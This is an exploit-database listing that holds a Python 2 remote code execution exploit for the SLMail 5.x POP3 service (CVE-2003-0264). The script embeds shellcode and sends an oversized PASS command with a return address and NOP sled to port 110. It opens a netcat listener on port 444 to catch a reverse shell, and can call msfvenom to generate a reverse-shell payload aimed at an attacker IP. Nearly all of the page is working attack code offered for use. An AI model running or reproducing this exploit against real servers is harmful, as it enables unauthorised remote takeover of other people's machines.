Exploit for SLMail 5.1.0.4420 Remote Code Execution CVE-2003-0264

Name: Exploit for SLMail 5.1.0.4420 Remote Code Execution CVE-2003-0264
Rating: 5 (188 reviews)
2021-02-24 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:161526
# -*- coding: utf-8 -*-  
import socket  
from time import sleep  
from os import system  
  
system("clear")  
print 'Shell-code-foi-informada?\r\n'  
print '[1] sim'  
print '[2] nao\n'  
quest = int(input('>>> '))  
  
def main():  
system("clear")  
#============================  
#--ensira-sua-shell-code-aqui  
  
buf = ""  
buf += "\xb8\xaa\x62\xd3\xea\xda\xd4\xd9\x74\x24\xf4\x5e\x29"  
buf += "\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x44\x9e\x31"  
buf += "\x1f\x64\xb7\x34\xe0\x94\x48\x59\x68\x71\x79\x59\x0e"  
buf += "\xf2\x2a\x69\x44\x56\xc7\x02\x08\x42\x5c\x66\x85\x65"  
buf += "\xd5\xcd\xf3\x48\xe6\x7e\xc7\xcb\x64\x7d\x14\x2b\x54"  
buf += "\x4e\x69\x2a\x91\xb3\x80\x7e\x4a\xbf\x37\x6e\xff\xf5"  
buf += "\x8b\x05\xb3\x18\x8c\xfa\x04\x1a\xbd\xad\x1f\x45\x1d"  
buf += "\x4c\xf3\xfd\x14\x56\x10\x3b\xee\xed\xe2\xb7\xf1\x27"  
buf += "\x3b\x37\x5d\x06\xf3\xca\x9f\x4f\x34\x35\xea\xb9\x46"  
buf += "\xc8\xed\x7e\x34\x16\x7b\x64\x9e\xdd\xdb\x40\x1e\x31"  
  
#===========================  
  
print 'Exploit - CVE-2003-0264\nplatfor: windows\nPOP3 SLmail-5.5 overflow :)'  
print '\nby: - Mednic -\r\n'  
host = raw_input('Host: ')  
  
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 39 + buf  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
sleep(3)  
print '\nIniciando conexão ao servidor...\n'  
sleep(2)  
try:  
s.connect((host, 110))  
s.recv(1024)  
except:  
print 'Conexão recusada !'  
exit()  
s.settimeout(1)  
print '\nEnviando usuario...\n'  
s.send("USER guest\r\n")  
s.recv(1024)  
s.settimeout(1)  
print '\nIniciando estouro de buffer...\n'  
system('nc -nlvp 444')  
s.send("PASS "+buffer+"\r\n")  
s.recv(1024)  
s.send("QUIT\r\n")  
s.close()  
  
if quest == 1:  
main()  
  
elif quest == 2:  
print "IP para conexão reversa !"  
ip = raw_input('>>> ')  
system('clear')  
system('msfvenom -p windows/shell_reverse_tcp LHOST='+ip+" LPORT=444 -b "+'\\x00\\x0a\\x0d\\x20'+" -f python")  
print '\r\nCopie e substitua pelo setado no codigo !'  
else:  
print 'Invalido argumento'  
exit()